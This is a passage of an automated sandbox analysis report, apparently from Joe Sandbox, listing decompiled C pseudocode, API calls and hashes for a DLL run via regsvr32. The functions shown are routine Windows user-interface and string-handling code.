                                                                                                            				 *(_t112 + 0x1c) = _t103[0x1c];
                                                                                                            				_t88 = _t103[0x14];
                                                                                                            				 *(_t127 + 0x98) = _t88;
                                                                                                            				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
                                                                                                            					if(_t88 != 0) {
                                                                                                            						_t121 = lstrlenA(_t88) + 1;
                                                                                                            						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            					}
                                                                                                            					__imp__#2(_t88);
                                                                                                            					 *(_t112 + 0xc) = _t88;
                                                                                                            				}
                                                                                                            				_t107 = _t103[0x18];
                                                                                                            				_t89 = 0;
                                                                                                            				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                                                                                                            					if(_t107 != 0) {
                                                                                                            						_t119 = lstrlenA(_t107) + 1;
                                                                                                            						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            					}
                                                                                                            					__imp__#2(_t89);
                                                                                                            					 *(_t112 + 4) = _t89;
                                                                                                            				}
                                                                                                            				goto L12;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                                                              • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                                                            • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2903237683-0
                                                                                                            • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                                                            • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002F6AD(void* __ecx, int _a4) {
                                                                                                            				int _v8;
                                                                                                            				struct tagRECT _v24;
                                                                                                            				long _t39;
                                                                                                            				int _t42;
                                                                                                            				int _t43;
                                                                                                            				int _t62;
                                                                                                            				int _t66;
                                                                                                            				void* _t68;
                                                                                                            				long _t69;
                                                                                                            				int _t71;
                                                                                                            
                                                                                                            				_t69 = _a4;
                                                                                                            				_t68 = __ecx;
                                                                                                            				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
                                                                                                            				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                                                            					GetWindowRect( *(_t68 + 0x1c),  &_v24);
                                                                                                            					_t42 = _a4;
                                                                                                            					_t66 =  *(_t42 + 0x10);
                                                                                                            					_t71 = _v24.right - _v24.left;
                                                                                                            					_t62 = _v24.bottom - _v24.top;
                                                                                                            					_t43 =  *(_t42 + 0x14);
                                                                                                            					_v8 = _t66;
                                                                                                            					_a4 = _t43;
                                                                                                            					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
                                                                                                            						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						_t66 = _v8;
                                                                                                            						_t43 = _a4;
                                                                                                            					}
                                                                                                            					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
                                                                                                            						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
                                                                                                            						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            					}
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            				return _t39;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                                                            • GetWindowRect.USER32 ref: 1002F6DA
                                                                                                            • SetRect.USER32 ref: 1002F714
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                                                            • SetRect.USER32 ref: 1002F73A
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                                                            • SetRect.USER32 ref: 1002F774
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                                                            • SetRect.USER32 ref: 1002F796
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Invalidate$Window$Proc
                                                                                                            • String ID:
                                                                                                            • API String ID: 570070710-0
                                                                                                            • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                                                            • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10020B9B() {
                                                                                                            				signed int _t39;
                                                                                                            				CHAR* _t43;
                                                                                                            				int _t44;
                                                                                                            				WNDCLASSA* _t63;
                                                                                                            				void* _t71;
                                                                                                            				void* _t73;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a552, _t71);
                                                                                                            				_t63 =  *(_t71 + 8);
                                                                                                            				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
                                                                                                            				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
                                                                                                            					if(RegisterClassA(_t63) == 0) {
                                                                                                            						L5:
                                                                                                            						_t39 = 0;
                                                                                                            					} else {
                                                                                                            						 *(_t71 - 0x18) = 1;
                                                                                                            						if( *((char*)(E100373B5() + 0x14)) == 0) {
                                                                                                            							L10:
                                                                                                            							_t39 =  *(_t71 - 0x18);
                                                                                                            						} else {
                                                                                                            							E10037A1B(1);
                                                                                                            							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                            							_t43 = E100373B5() + 0x34;
                                                                                                            							 *(_t71 - 0x14) = _t43;
                                                                                                            							_t44 = lstrlenA(_t43);
                                                                                                            							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
                                                                                                            							if(_t44 + _t13 < 0x1000) {
                                                                                                            								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
                                                                                                            								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
                                                                                                            									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
                                                                                                            									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
                                                                                                            								} else {
                                                                                                            									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
                                                                                                            									 *(_t71 + 0xa) = 0xa;
                                                                                                            									 *((char*)(_t71 + 0xb)) = 0;
                                                                                                            									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
                                                                                                            								}
                                                                                                            								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                                            								E10037A7E(1);
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t39 = 1;
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                                                            				return _t39;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                            • String ID:
                                                                                                            • API String ID: 3690589370-0
                                                                                                            • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                                                            • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001F0D1(intOrPtr* __ecx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t67;
                                                                                                            				intOrPtr* _t68;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t76;
                                                                                                            				struct HWND__* _t77;
                                                                                                            				signed int _t80;
                                                                                                            				int _t96;
                                                                                                            				signed int _t97;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				signed int _t116;
                                                                                                            				signed int _t135;
                                                                                                            				DLGTEMPLATE* _t136;
                                                                                                            				struct HWND__* _t138;
                                                                                                            				void* _t139;
                                                                                                            				void* _t141;
                                                                                                            
                                                                                                            				_t109 = __ecx;
                                                                                                            				E10011BF0(0x1003a3de, _t139);
                                                                                                            				_t107 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
                                                                                                            				if( *(_t139 + 0x10) == 0) {
                                                                                                            					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
                                                                                                            				}
                                                                                                            				_t135 =  *(E100373B5() + 0x1038);
                                                                                                            				 *(_t139 - 0x28) = _t135;
                                                                                                            				 *(_t139 - 0x14) = 0;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x24)) = 0;
                                                                                                            				 *(_t139 - 4) = 0;
                                                                                                            				E10021D47(_t109, 0x10);
                                                                                                            				E10021D47(_t109, 0x7c000);
                                                                                                            				if(_t135 == 0) {
                                                                                                            					_t136 =  *(_t139 + 8);
                                                                                                            					L7:
                                                                                                            					__eflags = _t136;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L4:
                                                                                                            						_t67 = 0;
                                                                                                            						L32:
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
                                                                                                            						return _t67;
                                                                                                            					}
                                                                                                            					_t68 = E100243B2();
                                                                                                            					_t129 =  *_t68;
                                                                                                            					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
                                                                                                            					 *(_t139 - 4) = 1;
                                                                                                            					 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                                                            					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
                                                                                                            					__eflags =  *0x1004efe4; // 0x0
                                                                                                            					_t74 = 0 | __eflags == 0x00000000;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L14:
                                                                                                            						__eflags = _t74;
                                                                                                            						if(_t74 == 0) {
                                                                                                            							L17:
                                                                                                            							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
                                                                                                            							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
                                                                                                            							_push(_t107);
                                                                                                            							E100237EE();
                                                                                                            							_t76 =  *(_t139 + 0xc);
                                                                                                            							__eflags = _t76;
                                                                                                            							if(_t76 != 0) {
                                                                                                            								_t77 =  *(_t76 + 0x1c);
                                                                                                            							} else {
                                                                                                            								_t77 = 0;
                                                                                                            							}
                                                                                                            							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
                                                                                                            							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
                                                                                                            							_t116 =  *(_t139 - 0x28);
                                                                                                            							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t116;
                                                                                                            							if(_t116 != 0) {
                                                                                                            								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
                                                                                                            								__eflags = _t138;
                                                                                                            								if(_t138 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t107 + 0x12c))(0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t80 = E10022196();
                                                                                                            							__eflags = _t80;
                                                                                                            							if(_t80 == 0) {
                                                                                                            								 *((intOrPtr*)( *_t107 + 0x114))();
                                                                                                            							}
                                                                                                            							__eflags = _t138;
                                                                                                            							if(_t138 != 0) {
                                                                                                            								__eflags =  *(_t107 + 0x38) & 0x00000010;
                                                                                                            								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
                                                                                                            									DestroyWindow(_t138);
                                                                                                            									_t138 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *(_t139 - 0x14);
                                                                                                            							if( *(_t139 - 0x14) != 0) {
                                                                                                            								GlobalUnlock( *(_t139 - 0x14));
                                                                                                            								GlobalFree( *(_t139 - 0x14));
                                                                                                            							}
                                                                                                            							__eflags = _t138;
                                                                                                            							_t60 = _t138 != 0;
                                                                                                            							__eflags = _t60;
                                                                                                            							_t67 = 0 | _t60;
                                                                                                            							goto L32;
                                                                                                            						}
                                                                                                            						L15:
                                                                                                            						E10024A0E(_t139 - 0x38, _t136);
                                                                                                            						 *(_t139 - 4) = 2;
                                                                                                            						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
                                                                                                            						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
                                                                                                            						 *(_t139 - 4) = 1;
                                                                                                            						E10024716(_t139 - 0x38);
                                                                                                            						__eflags =  *(_t139 - 0x14);
                                                                                                            						if( *(_t139 - 0x14) != 0) {
                                                                                                            							_t136 = GlobalLock( *(_t139 - 0x14));
                                                                                                            						}
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					__eflags = _t74;
                                                                                                            					if(_t74 != 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_t96 = GetSystemMetrics(0x2a);
                                                                                                            					__eflags = _t96;
                                                                                                            					if(_t96 == 0) {
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
                                                                                                            					asm("sbb al, al");
                                                                                                            					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
                                                                                                            					__eflags = _t74;
                                                                                                            					if(_t74 == 0) {
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					__eflags =  *((short*)(_t139 - 0x18)) - 8;
                                                                                                            					if( *((short*)(_t139 - 0x18)) == 8) {
                                                                                                            						 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                                                            					}
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				_push(_t139 - 0x48);
                                                                                                            				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
                                                                                                            					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                                                            • GetSystemMetrics.USER32 ref: 1001F19A
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F205
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 2364537584-76309092
                                                                                                            • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                                                            • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t12;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				void* _t18;
                                                                                                            				void* _t19;
                                                                                                            				void* _t29;
                                                                                                            				struct HWND__* _t30;
                                                                                                            				signed int _t34;
                                                                                                            				void* _t37;
                                                                                                            				void* _t41;
                                                                                                            				void* _t44;
                                                                                                            
                                                                                                            				_t29 = __ebx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t37 = __ecx;
                                                                                                            				_t12 = E10023092(__ecx);
                                                                                                            				_t34 = _a4 & 0x0000fff0;
                                                                                                            				_t41 = _t12;
                                                                                                            				_t14 = _t34 - 0xf040;
                                                                                                            				if(_t14 == 0) {
                                                                                                            					L12:
                                                                                                            					if(_a8 != 0x75 || _t41 == 0) {
                                                                                                            						L15:
                                                                                                            						_t15 = 0;
                                                                                                            						goto L16;
                                                                                                            					} else {
                                                                                                            						E1002040A(_t41);
                                                                                                            						L11:
                                                                                                            						_t15 = 1;
                                                                                                            						L16:
                                                                                                            						return _t15;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t18 = _t14 - 0x10;
                                                                                                            				if(_t18 == 0) {
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            				_t19 = _t18 - 0x10;
                                                                                                            				if(_t19 == 0 || _t19 == 0xa0) {
                                                                                                            					if(_t34 == 0xf060 || _a8 != 0) {
                                                                                                            						if(_t41 != 0) {
                                                                                                            							_push(_t29);
                                                                                                            							_t30 =  *(_t37 + 0x1c);
                                                                                                            							_v8 = GetFocus();
                                                                                                            							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
                                                                                                            							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
                                                                                                            							if(IsWindow(_t30) != 0) {
                                                                                                            								SetActiveWindow(_t30);
                                                                                                            							}
                                                                                                            							if(IsWindow(_v8) != 0) {
                                                                                                            								SetFocus(_v8);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L11;
                                                                                                            				} else {
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveFocus$MessageSend
                                                                                                            • String ID: u
                                                                                                            • API String ID: 1556911595-4067256894
                                                                                                            • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                                                            • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v40;
                                                                                                            				void _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				intOrPtr _t14;
                                                                                                            				void* _t15;
                                                                                                            				int _t24;
                                                                                                            				char* _t30;
                                                                                                            				struct HDC__* _t32;
                                                                                                            
                                                                                                            				_t14 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t32 = GetStockObject;
                                                                                                            				_t24 = 0xa;
                                                                                                            				_v8 = _t14;
                                                                                                            				_v72 = __ecx;
                                                                                                            				_t30 = "System";
                                                                                                            				_t15 = GetStockObject(0x11);
                                                                                                            				if(_t15 != 0) {
                                                                                                            					L2:
                                                                                                            					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
                                                                                                            						_t30 =  &_v40;
                                                                                                            						_t32 = GetDC(0);
                                                                                                            						if(_v68 < 0) {
                                                                                                            							_v68 =  ~_v68;
                                                                                                            						}
                                                                                                            						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
                                                                                                            						ReleaseDC(0, _t32);
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					if(_a4 == 0) {
                                                                                                            						_a4 = _t24;
                                                                                                            					}
                                                                                                            					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
                                                                                                            				}
                                                                                                            				_t15 = GetStockObject(0xd);
                                                                                                            				if(_t15 == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 10024994
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                                                            • GetDC.USER32(00000000), ref: 100249B8
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                                                            • ReleaseDC.USER32 ref: 100249E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                                                            • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 40%
                                                                                                            			E1002155E(signed int _a4, signed int _a8) {
                                                                                                            				struct HINSTANCE__* _t6;
                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                            				struct HINSTANCE__* _t13;
                                                                                                            				struct HINSTANCE__* _t14;
                                                                                                            				CHAR* _t16;
                                                                                                            				signed int _t17;
                                                                                                            
                                                                                                            				_t16 = "COMCTL32.DLL";
                                                                                                            				_t14 = GetModuleHandleA(_t16);
                                                                                                            				_t6 = LoadLibraryA(_t16);
                                                                                                            				_t13 = _t6;
                                                                                                            				if(_t13 == 0) {
                                                                                                            					return _t6;
                                                                                                            				} else {
                                                                                                            					_t17 = 0;
                                                                                                            					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                                                                                            					if(_t7 != 0) {
                                                                                                            						_push(_a4);
